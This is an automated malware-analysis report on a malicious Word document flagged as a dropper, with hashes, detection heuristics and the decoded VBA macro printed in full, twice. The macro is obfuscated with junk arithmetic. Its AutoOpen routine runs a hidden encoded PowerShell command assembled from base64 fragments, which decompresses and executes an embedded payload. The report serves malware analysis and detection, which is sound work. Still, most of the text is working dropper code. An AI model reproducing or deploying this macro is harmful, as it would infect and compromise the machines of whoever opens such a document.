Office (OLE) malware analysis — malicious · f934cda10d7454a7

MALICIOUS

Office (OLE)

90.5 KB Created: 2018-06-01 08:53:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: 455e0d304504155557fc662b2ffcede0 SHA-1: f2129bb6fbd6bbbb19e3b9d15f5996e6059d81a7 SHA-256: f934cda10d7454a7403bf5e3372ff4581300e07d6755c1c6ea79f0aaa1791423

242 Risk Score

Heuristics 7

ClamAV: Doc.Dropper.Agent-6567903-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6567903-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

jEoJi = CSng(15980 * CInt(9274) + 37921 - 74822)
qCHtznqwaWX = slqtcfJls + Shell(BVidaZSh + Chr(vbKeyP) + UoEdzMcBLl + iCwTk + ofNnY + CCEPIolX + jjWDFwJwSEi, PLVTX + vbHide + hcdJRZ)
Yoanw = 1642 + Log(29548) - ViiwR / Atn(54315) / tzErWN / UEMltj

AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10313 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10313 bytes
SHA-256: `e99d9df43adc5036070c77a9d7f042d2b12ae4b13aad33670e102c6f1b58947a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "TYnQjlOFSoE" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function qCHtznqwaWX() On Error Resume Next qKIXCX = 15075 + Log(65690) - Ukwad / Atn(35909) / akGjF / VQNYo miIDDL = CSng(38432 * CInt(74338) + 18665 - 74314) bbAjiv = 79004 + Log(68400) - sqhtk / Atn(65356) / ppsKii / wpMhvO jEoJi = CSng(15980 * CInt(9274) + 37921 - 74822) qCHtznqwaWX = slqtcfJls + Shell(BVidaZSh + Chr(vbKeyP) + UoEdzMcBLl + iCwTk + ofNnY + CCEPIolX + jjWDFwJwSEi, PLVTX + vbHide + hcdJRZ) Yoanw = 1642 + Log(29548) - ViiwR / Atn(54315) / tzErWN / UEMltj ZcWCX = CSng(73332 * CInt(79558) + 14479 - 78539) End Function Sub Autoopen() On Error Resume Next owOaj = 59432 + Log(67377) - LMlJAb / Atn(32354) / iTVaK / fNvCI uqHlKE = CSng(6838 * CInt(48762) + 98960 - 37084) qCHtznqwaWX ZdwhXT = 31769 + Log(53642) - lPHVlO / Atn(80093) / RAihWo / VEAwvY HLivzL = CSng(50905 * CInt(14674) + 88867 - 59442) End Sub Attribute VB_Name = "OIiimAwOXIw" Function UoEdzMcBLl() On Error Resume Next FwjniG = 75769 + Log(59161) - ANiAm / Atn(14703) / uoBZrN / Yvzpc QKoVd = CSng(42462 * CInt(63964) + 28886 - 66225) DAYJfIkNwc = "owersHe" + "LL " + "-e KABuA" + "GUAdw" mkRLs = 689 + Log(71122) - awHjKN / Atn(12134) / sjHriR / KoqZM QaTMP = CSng(29760 * CInt(78452) + 50520 - 3229) vRZHMAZrjN = "AtAG8AYg" + "BK" + "AGUAQwBUACAAIAB" + "JAE8ALgB" YKAOf = 24996 + Log(63270) - aPmdBH / Atn(83121) / VZHXCb / cKWoX wRQqIj = CSng(62202 * CInt(66798) + 4748 - 60753) fIXzJTRslj = "DAG8A" + "TQBwAFIARQBzA" + "HMAaQBPAE4AL" + "gBkAGUARgB" + "MAGEAdABFAFMA" Hqwzkm = 48489 + Log(23377) - auPTi / Atn(42147) / mXEJYJ / bzWmt KHStJ = CSng(29439 * CInt(23025) + 55115 - 52910) EFHqbd = "dABSAEUAYQBNACg" + "AWwBJAE8ALgB" + "tAEUAbQBvAFIAWQ" + "BTAHQAcg" + "BFAEEAT" + "QBdAC" XwcCUE = 3733 + Log(95112) - mntLw / Atn(42195) / wkWzO / joKTbV PJUKf = CSng(61926 * CInt(24662) + 93107 - 12775) kmdFEovUm = "AAW" + "wBjAG8AbgBWAGU" + "AcgB0AF" + "0AOgA6AGYAcg" + "BPAE0" + "AYgB" XwYaHj = 32486 + Log(92139) - XlQbF / Atn(54738) / YQnsBd / owcTjf JcrAz = CSng(5842 * CInt(80407) + 47263 - 48241) dbpATjNwKh = "hAFM" + "AZQA2ADQAcwBUA" + "HIASQBuA" + "GcAKAAnAFQAWgBI" + "AG" + "YAYQA5AHMAdwB" UoEdzMcBLl = DAYJfIkNwc + vRZHMAZrjN + fIXzJTRslj + EFHqbd + kmdFEovUm + dbpATjNwKh End Function Function iCwTk() On Error Resume Next tXGwY = 97103 + Log(67167) - iBHwJ / Atn(27214) / uQkiiQ / QCOJZa Znzri = CSng(98554 * CInt(58648) + 43257 - 64885) TwXlU = "FAE0AZgB" + "mAEIALwAw" + "AGYAUg" + "BEAEMAVgBqAE" + "IAdABwAFQAVw" + "BDAFUAbQBrAEgA" + "YQBoAEkAMA" + "A4AE4ATgAxAHcAU" + "wBwAGUAeQ" wtFAd = 20029 + Log(25083) - dREnF / Atn(89243) / oLGEjO / IHINH bOEYi = CSng(39464 * CInt(61455) + 72236 - 22578) zRwEvTbd = "BCADgAd" + "gB5A" + "HUAWABGA" + "GkAUwA4" msBqvJ = 4232 + Log(73874) - FztnXS / Atn(96263) / YkzrQ / IrONj kOIci = CSng(39733 * CInt(23022) + 65677 - 47480) wGWWDj = "AGEAVwBrA" + "DMAWQBoA" + "C8ALwB2AHUAM" + "ABqAHgAVQA0AFAA" + "UAAzAH" + "AATQA5AHgAdgB3A" zFWfCH = 63713 + Log(52214) - FkTHAN / Atn(79169) / pswjw / hzroR CGPcu = CSng(72671 * CInt(85880) + 40912 - 71069) UKbAjb = "EwAYgA" + "2AFYAe" + "AAzAE8AZg" + "B2A" + "E8ATABn" + "AFcAMwBQAE8ATAB" + "BAEkAOA" + "BIADM" + "AU" + "QA1AGQ" BKnjb = 39439 + Log(33325) - IOpwW / Atn(79316) / zDjohL / PRdzU MOVTlo = CSng(83275 * CInt(76096) + 86649 - 30627) EjPRk = "AdAB" + "5AEQARQA" + "4AGoATABq" + "AG4A" + "SQ" + "BXAHU" + "AM" NjjjCT = 8389 + Log(69008) - CziJjD / Atn(79773) / vVCbAa / ttVNhz EnobAb = CSng(72546 * CInt(24845) + 96225 - 49164) AijVpSDdi = "QB6AFYAMA" + "BkAEI" + "ANgB2AFYARQA3AE" + "kAU" tpPjM = 75925 + Log(64602) - IsXNSM / Atn(12062) / nJwqCc / tvUEC ziXcM = CSng(12563 * CInt(71294) + 61293 - 25348) UEVBGImp = "wBXAFEAVAA1AG" + "4AdQBDA" + "GgAUQA1AFYAd" + "AB5AEQAZQBJA" + "GgAaQB4ADUA" + "NwB6AHoAVQBjAGc" + "ARgBlA" + "FAAawBNADIAc" + "gBVAHEAdwBQA" + "GcANABX" hfipuj = 48976 + Log(42770) - umwDz / Atn(66608) / QZVkr / ilKKzk GVJac = CSng(31639 * CInt(21333) + 38305 - 74624) vwaMItf = "AHkAVAAxAEcAQg" + "B1AG" + "UARQAwAHMASwBiA" + "EYAOQBkAGYA" + "OABWAHkAe" + "AAwAGMAMwBvAGUA" + "agB3AE8A" + "NAArAEIAdQBOAHY" + "AMgBEAGsATwB" + "BAFgAWA" MWzqH = 53768 + Log(98406) - YuzpLJ / Atn(55209) / zAzfjh / QIZdYa XtiEJO = CSng(88537 * CInt(85975) + 44354 - 17678) SfQTnirXX = "A5AGIAZQBOA" + "DcAZABLADc" + "AVABQAGQAVQ" + "B5AEcA" + "dABOAEsANgBXAE" + "cAYwBwAFcAc" fbqGQ = 19289 + Log(98278) - nRKWHl / Atn(59567) / hhiwaE / WGLGAO GdnUEF = CSng(95416 * CInt(18208) + 83402 - 29714) CizLNLbP = "gBaAG" + "IAagBYA" + "HkAaQB" + "hAEIAegB" iCwTk = TwXlU + zRwEvTbd + wGWWDj + UKbAjb + EjPRk + AijVpSDdi + UEVBGImp + vwaMItf + SfQTnirXX + CizLNLbP End Function Function ofNnY() On Error Resume Next anRNWW = 37861 + Log(59130) - MKoKkb / Atn(74652) / AFDwj / KjinhZ YqTUAQ = CSng(44105 * CInt(17736) + 69153 - 78240) DdbwBZEhT = "VADUA" + "VQBhAGkAVgBR" + "AHIATgB" + "4AEgAVABUAHIAd" Vhivpd = 68842 + Log(54960) - dJlLf / Atn(84036) / HjnjmF / nUVpkK LQQRd = CSng(2635 * CInt(18747) + 29005 - 83236) YUtUtrM = "gBQAGMAZQ" + "BIAFMAcgBLAFUA" + "aABDADkARgBt" + "AGcAZQ" + "BmADcAdQBYA" + "GI" + "AN" + "QA4AGkAN" DEGGP = 8611 + Log(14080) - IWPcwF / Atn(99974) / lvbTn / RCSsVu qkspi = CSng(61830 * CInt(65526) + 97141 - 80543) uFaiACf = "gBOAE8" + "AdABMADQARQBJAG" + "IAUwBX" + "AFYANw" + "AyAG8AMQBH" + "AHQAbQBrA" + "CsASABmA" + "G0AbA" + "BPAHEAZwB" + "xAHEARAB2" POAbo = 376 + Log(66878) - LRNQO / Atn(76777) / RDmDo / jMnSl mOYRR = CSng(90695 * CInt(43127) + 21482 - 10153) cnzzzEhaGf = "AFoARQBm" + "AHQASwBaA" + "FAATQA4" + "AGIAZ" + "QA5AHUAeQBGA" + "G4AZwB1" XdCjYJ = 56336 + Log(78449) - WERQcv / Atn(89520) / CjBMJ / cvFmz VscSif = CSng(16919 * CInt(2600) + 10316 - 95168) lPLUTiX = "AFoATQBvAGQAbw" + "BW" + "AE8ANwBSADkA" + "SgBuAE4AUQBMADg" + "AcwBHADk" + "AVQA5" + "AEM" + "AMg" + "A5AGUARgA0AHE" jwsPT = 40323 + Log(95262) - WXtUiD / Atn(50821) / bZnTX / tEdbzm mtvEHR = CSng(27330 * CInt(33444) + 75630 - 18004) jjVXW = "AR" + "gBNA" + "G0AcQByADAA" + "ZwBr" + "ADgA" + "NABOAH" + "AAbgBNAHAAag" + "BRAEkAc" + "wBMAH" + "YAYgBw" ofNnY = DdbwBZEhT + YUtUtrM + uFaiACf + cnzzzEhaGf + lPLUTiX + jjVXW End Function Function CCEPIolX() On Error Resume Next IqcYbY = 96813 + Log(28137) - RhbSi / Atn(4975) / FnlrV / AjdwP lMznQ = CSng(23774 * CInt(21000) + 63425 - 2117) lrzczk = "AHMAKwBxADAA" + "cg" + "BDAEkAOABi" + "ADg" + "AYwA3AFcAbA" + "BHAEUAUgBPAEMA" dFdki = 59814 + Log(9543) - daEMI / Atn(57871) / RFzpt / dIbcrU KFTVEk = CSng(18567 * CInt(61336) + 28236 - 70731) hMkrrfjNOd = "VQ" + "B6AFgAdwBSAHMA" + "TQBIAEQAQwB" + "sAGMAQ" + "wA5AHEAcwBSAG" + "EAQwA3AHc" + "AcgBEA" + "FMAc" + "wB0AE8A" UiMUpS = 48966 + Log(6381) - lzGNr / Atn(15057) / AzCIqK / HYGiH UVCUU = CSng(40350 * CInt(28067) + 65647 - 16915) DdnhM = "ZwB3AG8A" + "TgB2ADMAdw" + "ArADAA" + "RQB" + "UAG0AWQB1AGYAVA" + "Ba" + "AFYAdQBtAGoAe" + "gBuA" IDoBI = 22579 + Log(97543) - iwJJi / Atn(24308) / lKTFwi / RiwQwm Wtsrdt = CSng(9099 * CInt(4984) + 17761 - 5267) YwpMHFEHmk = "C8ATQAwA" + "HcAbwBHAE" + "gANgBnA" + "GMATABGADMAaQ" + "Ay" + "ADcAUgB" + "NAEYA" + "NgA4AEQARQBW" + "ADQA" + "eAB5" ZBELPL = 75145 + Log(81199) - iKucMl / Atn(47567) / JCrPMM / DQRFT jBRJW = CSng(63183 * CInt(60183) + 11715 - 29152) UpTXQJBJh = "AGgAMwBHAGwANQ" + "BpAEEAKwByAEEAN" + "wBSAHg" + "AbQAy" + "AHQARQBRAFkANAB" + "zA" + "Fg" + "AYwBVAD" dFuKLw = 30236 + Log(59762) - USsGKf / Atn(25021) / vIwuiX / zJdTq tfuPO = CSng(18409 * CInt(34817) + 2571 - 94602) knWoP = "UAYwAxA" + "DcAbABCA" + "DgAawBCAG4AbQ" + "AzAGMAWgBIAG8AN" + "wAxAFoASA" + "A0ADcASAAvAHc" + "APQA9ACc" + "AIAApACwAWwBp" + "AG8ALgBDAG8" AmMwF = 81341 + Log(89964) - iJrjw / Atn(31395) / viaLBU / pobnwq WunwDz = CSng(15011 * CInt(41416) + 48206 - 28382) BJOvfjZfGc = "AbQBQAFIAZQ" + "BTAFMAS" + "QBPAG" + "4ALgB" + "DAE8AT" + "QBQAHIARQBzAFM" + "ASQBPAG4AbQBP" OXpjM = 19259 + Log(64737) - WTarqv / Atn(69535) / zYWRs / KHODk SlZJLC = CSng(74578 * CInt(94978) + 14558 - 16442) RjnUJ = "AEQ" + "ARQBdADoA" + "OgBEAE" + "UA" + "Yw" + "BvAG0AcA" + "BSAGUAc" + "wBzACkAfA" + "AgAEYAbwBSA" + "EUAQQB" RFUTbv = 6324 + Log(95868) - StKzC / Atn(93874) / KMhRJ / mLluR oImwow = CSng(10118 * CInt(23903) + 46118 - 70532) iqHhMXSi = "DAEgALQ" + "BvAE" + "IA" + "agBF" + "AGMAVAAgAHs" + "AIABu" + "AG" + "UAdwAtAG8A" + "YgBKAGUAQw" + "BUACAAI" MLFhcY = 51403 + Log(54382) - Okcka / Atn(82315) / sSIih / XJujwV zktZi = CSng(39335 * CInt(12155) + 6182 - 83956) pViLbY = "ABpAG8A" + "LgBTAHQAc" + "gBlAEEAbQBSAEUA" + "YQBkAEUAc" + "gAoACQ" + "AXwA" CCEPIolX = lrzczk + hMkrrfjNOd + DdnhM + YwpMHFEHmk + UpTXQJBJh + knWoP + BJOvfjZfGc + RjnUJ + iqHhMXSi + pViLbY End Function Function jjWDFwJwSEi() On Error Resume Next nKSJQ = 6091 + Log(62491) - WziNt / Atn(30460) / Biovn / bEbKir GGkPA = CSng(15612 * CInt(40267) + 45246 - 29449) JXSHO = "sACAAWwBUAEU" + "AWAB0AC4AZ" + "QBuAGM" + "AbwBkAEkAbgBnA" GGNda = 46145 + Log(41980) - qdXdmS / Atn(13875) / OLFqz / LivQNP luilN = CSng(64663 * CInt(79471) + 48634 - 34346) wmFhJi = "F0AOgA6AEEAcwBD" + "AGkAaQAgAC" + "kAI" + "AB9ACAAf" + "AAgA" + "EYAbwBy" jGanO = 59577 + Log(56372) - SHwtJ / Atn(33966) / UTvji / KGXFi rYkRfz = CSng(20170 * CInt(48101) + 69365 - 48783) vQODFa = "AEUAQQBjAGgA" + "LQ" + "BPAGIA" + "SgBFAGMAdAB7AC" + "AA" + "JABfA" + "C4Acg" + "BlAEE" zzSwvH = 31758 + Log(85110) - NMsNup / Atn(68777) / WzCifm / vhqQww pvVzkP = CSng(27708 * CInt(29611) + 98408 - 13370) PFOzzPij = "AZABUAE8" + "ARQBuA" + "GQAKAApAH0AI" + "AApACAAfA" + "Ag" + "ACYA" + "KAAg" + "ACgAWwBzAFQ" zfifW = 45577 + Log(80185) - UCkWQ / Atn(33765) / jANRz / mUXzsw UbGAv = CSng(41282 * CInt(66725) + 13863 - 14819) UKaUbZQzQzO = "AcgBJAE4ARw" + "BdACQAVgB" + "lAFIAYgB" + "PAHMAZQBwA" + "FIARQBGAGU" KSbii = 80579 + Log(8829) - FjYjN / Atn(3350) / HQKKGi / bktsvk uiFYkD = CSng(97845 * CInt(46988) + 25108 - 14586) YpPBEwh = "AcgBlAE4AQwBF" + "ACkAWwAxACw" + "AMwBdACsAJwBY" + "ACcALQBKAE8A" + "aQBOACcAJwApA" + "A==" jjWDFwJwSEi = JXSHO + wmFhJi + vQODFa + PFOzzPij + UKaUbZQzQzO + YpPBEwh End Function

SHA-256: e99d9df43adc5036070c77a9d7f042d2b12ae4b13aad33670e102c6f1b58947a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "TYnQjlOFSoE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function qCHtznqwaWX()
On Error Resume Next
qKIXCX = 15075 + Log(65690) - Ukwad / Atn(35909) / akGjF / VQNYo
miIDDL = CSng(38432 * CInt(74338) + 18665 - 74314)
bbAjiv = 79004 + Log(68400) - sqhtk / Atn(65356) / ppsKii / wpMhvO
jEoJi = CSng(15980 * CInt(9274) + 37921 - 74822)
qCHtznqwaWX = slqtcfJls + Shell(BVidaZSh + Chr(vbKeyP) + UoEdzMcBLl + iCwTk + ofNnY + CCEPIolX + jjWDFwJwSEi, PLVTX + vbHide + hcdJRZ)
Yoanw = 1642 + Log(29548) - ViiwR / Atn(54315) / tzErWN / UEMltj
ZcWCX = CSng(73332 * CInt(79558) + 14479 - 78539)
End Function
Sub Autoopen()
On Error Resume Next
owOaj = 59432 + Log(67377) - LMlJAb / Atn(32354) / iTVaK / fNvCI
uqHlKE = CSng(6838 * CInt(48762) + 98960 - 37084)
qCHtznqwaWX
ZdwhXT = 31769 + Log(53642) - lPHVlO / Atn(80093) / RAihWo / VEAwvY
HLivzL = CSng(50905 * CInt(14674) + 88867 - 59442)
End Sub


Attribute VB_Name = "OIiimAwOXIw"
Function UoEdzMcBLl()
On Error Resume Next
FwjniG = 75769 + Log(59161) - ANiAm / Atn(14703) / uoBZrN / Yvzpc
QKoVd = CSng(42462 * CInt(63964) + 28886 - 66225)
DAYJfIkNwc = "owersHe" + "LL " + "-e KABuA" + "GUAdw"
mkRLs = 689 + Log(71122) - awHjKN / Atn(12134) / sjHriR / KoqZM
QaTMP = CSng(29760 * CInt(78452) + 50520 - 3229)
vRZHMAZrjN = "AtAG8AYg" + "BK" + "AGUAQwBUACAAIAB" + "JAE8ALgB"
YKAOf = 24996 + Log(63270) - aPmdBH / Atn(83121) / VZHXCb / cKWoX
wRQqIj = CSng(62202 * CInt(66798) + 4748 - 60753)
fIXzJTRslj = "DAG8A" + "TQBwAFIARQBzA" + "HMAaQBPAE4AL" + "gBkAGUARgB" + "MAGEAdABFAFMA"
Hqwzkm = 48489 + Log(23377) - auPTi / Atn(42147) / mXEJYJ / bzWmt
KHStJ = CSng(29439 * CInt(23025) + 55115 - 52910)
EFHqbd = "dABSAEUAYQBNACg" + "AWwBJAE8ALgB" + "tAEUAbQBvAFIAWQ" + "BTAHQAcg" + "BFAEEAT" + "QBdAC"
XwcCUE = 3733 + Log(95112) - mntLw / Atn(42195) / wkWzO / joKTbV
PJUKf = CSng(61926 * CInt(24662) + 93107 - 12775)
kmdFEovUm = "AAW" + "wBjAG8AbgBWAGU" + "AcgB0AF" + "0AOgA6AGYAcg" + "BPAE0" + "AYgB"
XwYaHj = 32486 + Log(92139) - XlQbF / Atn(54738) / YQnsBd / owcTjf
JcrAz = CSng(5842 * CInt(80407) + 47263 - 48241)
dbpATjNwKh = "hAFM" + "AZQA2ADQAcwBUA" + "HIASQBuA" + "GcAKAAnAFQAWgBI" + "AG" + "YAYQA5AHMAdwB"
UoEdzMcBLl = DAYJfIkNwc + vRZHMAZrjN + fIXzJTRslj + EFHqbd + kmdFEovUm + dbpATjNwKh
End Function
Function iCwTk()
On Error Resume Next
tXGwY = 97103 + Log(67167) - iBHwJ / Atn(27214) / uQkiiQ / QCOJZa
Znzri = CSng(98554 * CInt(58648) + 43257 - 64885)
TwXlU = "FAE0AZgB" + "mAEIALwAw" + "AGYAUg" + "BEAEMAVgBqAE" + "IAdABwAFQAVw" + "BDAFUAbQBrAEgA" + "YQBoAEkAMA" + "A4AE4ATgAxAHcAU" + "wBwAGUAeQ"
wtFAd = 20029 + Log(25083) - dREnF / Atn(89243) / oLGEjO / IHINH
bOEYi = CSng(39464 * CInt(61455) + 72236 - 22578)
zRwEvTbd = "BCADgAd" + "gB5A" + "HUAWABGA" + "GkAUwA4"
msBqvJ = 4232 + Log(73874) - FztnXS / Atn(96263) / YkzrQ / IrONj
kOIci = CSng(39733 * CInt(23022) + 65677 - 47480)
wGWWDj = "AGEAVwBrA" + "DMAWQBoA" + "C8ALwB2AHUAM" + "ABqAHgAVQA0AFAA" + "UAAzAH" + "AATQA5AHgAdgB3A"
zFWfCH = 63713 + Log(52214) - FkTHAN / Atn(79169) / pswjw / hzroR
CGPcu = CSng(72671 * CInt(85880) + 40912 - 71069)
UKbAjb = "EwAYgA" + "2AFYAe" + "AAzAE8AZg" + "B2A" + "E8ATABn" + "AFcAMwBQAE8ATAB" + "BAEkAOA" + "BIADM" + "AU" + "QA1AGQ"
BKnjb = 39439 + Log(33325) - IOpwW / Atn(79316) / zDjohL / PRdzU
MOVTlo = CSng(83275 * CInt(76096) + 86649 - 30627)
EjPRk = "AdAB" + "5AEQARQA" + "4AGoATABq" + "AG4A" + "SQ" + "BXAHU" + "AM"
NjjjCT = 8389 + Log(69008) - CziJjD / Atn(79773) / vVCbAa / ttVNhz
EnobAb = CSng(72546 * CInt(24845) + 96225 - 49164)
AijVpSDdi = "QB6AFYAMA" + "BkAEI" + "ANgB2AFYARQA3AE" + "kAU"
tpPjM = 75925 + Log(64602) - IsXNSM / Atn(12062) / nJwqCc / tvUEC
ziXcM = CSng(12563 * CInt(71294) + 61293 - 25348)
UEVBGImp = "wBXAFEAVAA1AG" + "4AdQBDA" + "GgAUQA1AFYAd" + "AB5AEQAZQBJA" + "GgAaQB4ADUA" + "NwB6AHoAVQBjAGc" + "ARgBlA" + "FAAawBNADIAc" + "gBVAHEAdwBQA" + "GcANABX"
hfipuj = 48976 + Log(42770) - umwDz / Atn(66608) / QZVkr / ilKKzk
GVJac = CSng(31639 * CInt(21333) + 38305 - 74624)
vwaMItf = "AHkAVAAxAEcAQg" + "B1AG" + "UARQAwAHMASwBiA" + "EYAOQBkAGYA" + "OABWAHkAe" + "AAwAGMAMwBvAGUA" + "agB3AE8A" + "NAArAEIAdQBOAHY" + "AMgBEAGsATwB" + "BAFgAWA"
MWzqH = 53768 + Log(98406) - YuzpLJ / Atn(55209) / zAzfjh / QIZdYa
XtiEJO = CSng(88537 * CInt(85975) + 44354 - 17678)
SfQTnirXX = "A5AGIAZQBOA" + "DcAZABLADc" + "AVABQAGQAVQ" + "B5AEcA" + "dABOAEsANgBXAE" + "cAYwBwAFcAc"
fbqGQ = 19289 + Log(98278) - nRKWHl / Atn(59567) / hhiwaE / WGLGAO
GdnUEF = CSng(95416 * CInt(18208) + 83402 - 29714)
CizLNLbP = "gBaAG" + "IAagBYA" + "HkAaQB" + "hAEIAegB"
iCwTk = TwXlU + zRwEvTbd + wGWWDj + UKbAjb + EjPRk + AijVpSDdi + UEVBGImp + vwaMItf + SfQTnirXX + CizLNLbP
End Function
Function ofNnY()
On Error Resume Next
anRNWW = 37861 + Log(59130) - MKoKkb / Atn(74652) / AFDwj / KjinhZ
YqTUAQ = CSng(44105 * CInt(17736) + 69153 - 78240)
DdbwBZEhT = "VADUA" + "VQBhAGkAVgBR" + "AHIATgB" + "4AEgAVABUAHIAd"
Vhivpd = 68842 + Log(54960) - dJlLf / Atn(84036) / HjnjmF / nUVpkK
LQQRd = CSng(2635 * CInt(18747) + 29005 - 83236)
YUtUtrM = "gBQAGMAZQ" + "BIAFMAcgBLAFUA" + "aABDADkARgBt" + "AGcAZQ" + "BmADcAdQBYA" + "GI" + "AN" + "QA4AGkAN"
DEGGP = 8611 + Log(14080) - IWPcwF / Atn(99974) / lvbTn / RCSsVu
qkspi = CSng(61830 * CInt(65526) + 97141 - 80543)
uFaiACf = "gBOAE8" + "AdABMADQARQBJAG" + "IAUwBX" + "AFYANw" + "AyAG8AMQBH" + "AHQAbQBrA" + "CsASABmA" + "G0AbA" + "BPAHEAZwB" + "xAHEARAB2"
POAbo = 376 + Log(66878) - LRNQO / Atn(76777) / RDmDo / jMnSl
mOYRR = CSng(90695 * CInt(43127) + 21482 - 10153)
cnzzzEhaGf = "AFoARQBm" + "AHQASwBaA" + "FAATQA4" + "AGIAZ" + "QA5AHUAeQBGA" + "G4AZwB1"
XdCjYJ = 56336 + Log(78449) - WERQcv / Atn(89520) / CjBMJ / cvFmz
VscSif = CSng(16919 * CInt(2600) + 10316 - 95168)
lPLUTiX = "AFoATQBvAGQAbw" + "BW" + "AE8ANwBSADkA" + "SgBuAE4AUQBMADg" + "AcwBHADk" + "AVQA5" + "AEM" + "AMg" + "A5AGUARgA0AHE"
jwsPT = 40323 + Log(95262) - WXtUiD / Atn(50821) / bZnTX / tEdbzm
mtvEHR = CSng(27330 * CInt(33444) + 75630 - 18004)
jjVXW = "AR" + "gBNA" + "G0AcQByADAA" + "ZwBr" + "ADgA" + "NABOAH" + "AAbgBNAHAAag" + "BRAEkAc" + "wBMAH" + "YAYgBw"
ofNnY = DdbwBZEhT + YUtUtrM + uFaiACf + cnzzzEhaGf + lPLUTiX + jjVXW
End Function
Function CCEPIolX()
On Error Resume Next
IqcYbY = 96813 + Log(28137) - RhbSi / Atn(4975) / FnlrV / AjdwP
lMznQ = CSng(23774 * CInt(21000) + 63425 - 2117)
lrzczk = "AHMAKwBxADAA" + "cg" + "BDAEkAOABi" + "ADg" + "AYwA3AFcAbA" + "BHAEUAUgBPAEMA"
dFdki = 59814 + Log(9543) - daEMI / Atn(57871) / RFzpt / dIbcrU
KFTVEk = CSng(18567 * CInt(61336) + 28236 - 70731)
hMkrrfjNOd = "VQ" + "B6AFgAdwBSAHMA" + "TQBIAEQAQwB" + "sAGMAQ" + "wA5AHEAcwBSAG" + "EAQwA3AHc" + "AcgBEA" + "FMAc" + "wB0AE8A"
UiMUpS = 48966 + Log(6381) - lzGNr / Atn(15057) / AzCIqK / HYGiH
UVCUU = CSng(40350 * CInt(28067) + 65647 - 16915)
DdnhM = "ZwB3AG8A" + "TgB2ADMAdw" + "ArADAA" + "RQB" + "UAG0AWQB1AGYAVA" + "Ba" + "AFYAdQBtAGoAe" + "gBuA"
IDoBI = 22579 + Log(97543) - iwJJi / Atn(24308) / lKTFwi / RiwQwm
Wtsrdt = CSng(9099 * CInt(4984) + 17761 - 5267)
YwpMHFEHmk = "C8ATQAwA" + "HcAbwBHAE" + "gANgBnA" + "GMATABGADMAaQ" + "Ay" + "ADcAUgB" + "NAEYA" + "NgA4AEQARQBW" + "ADQA" + "eAB5"
ZBELPL = 75145 + Log(81199) - iKucMl / Atn(47567) / JCrPMM / DQRFT
jBRJW = CSng(63183 * CInt(60183) + 11715 - 29152)
UpTXQJBJh = "AGgAMwBHAGwANQ" + "BpAEEAKwByAEEAN" + "wBSAHg" + "AbQAy" + "AHQARQBRAFkANAB" + "zA" + "Fg" + "AYwBVAD"
dFuKLw = 30236 + Log(59762) - USsGKf / Atn(25021) / vIwuiX / zJdTq
tfuPO = CSng(18409 * CInt(34817) + 2571 - 94602)
knWoP = "UAYwAxA" + "DcAbABCA" + "DgAawBCAG4AbQ" + "AzAGMAWgBIAG8AN" + "wAxAFoASA" + "A0ADcASAAvAHc" + "APQA9ACc" + "AIAApACwAWwBp" + "AG8ALgBDAG8"
AmMwF = 81341 + Log(89964) - iJrjw / Atn(31395) / viaLBU / pobnwq
WunwDz = CSng(15011 * CInt(41416) + 48206 - 28382)
BJOvfjZfGc = "AbQBQAFIAZQ" + "BTAFMAS" + "QBPAG" + "4ALgB" + "DAE8AT" + "QBQAHIARQBzAFM" + "ASQBPAG4AbQBP"
OXpjM = 19259 + Log(64737) - WTarqv / Atn(69535) / zYWRs / KHODk
SlZJLC = CSng(74578 * CInt(94978) + 14558 - 16442)
RjnUJ = "AEQ" + "ARQBdADoA" + "OgBEAE" + "UA" + "Yw" + "BvAG0AcA" + "BSAGUAc" + "wBzACkAfA" + "AgAEYAbwBSA" + "EUAQQB"
RFUTbv = 6324 + Log(95868) - StKzC / Atn(93874) / KMhRJ / mLluR
oImwow = CSng(10118 * CInt(23903) + 46118 - 70532)
iqHhMXSi = "DAEgALQ" + "BvAE" + "IA" + "agBF" + "AGMAVAAgAHs" + "AIABu" + "AG" + "UAdwAtAG8A" + "YgBKAGUAQw" + "BUACAAI"
MLFhcY = 51403 + Log(54382) - Okcka / Atn(82315) / sSIih / XJujwV
zktZi = CSng(39335 * CInt(12155) + 6182 - 83956)
pViLbY = "ABpAG8A" + "LgBTAHQAc" + "gBlAEEAbQBSAEUA" + "YQBkAEUAc" + "gAoACQ" + "AXwA"
CCEPIolX = lrzczk + hMkrrfjNOd + DdnhM + YwpMHFEHmk + UpTXQJBJh + knWoP + BJOvfjZfGc + RjnUJ + iqHhMXSi + pViLbY
End Function
Function jjWDFwJwSEi()
On Error Resume Next
nKSJQ = 6091 + Log(62491) - WziNt / Atn(30460) / Biovn / bEbKir
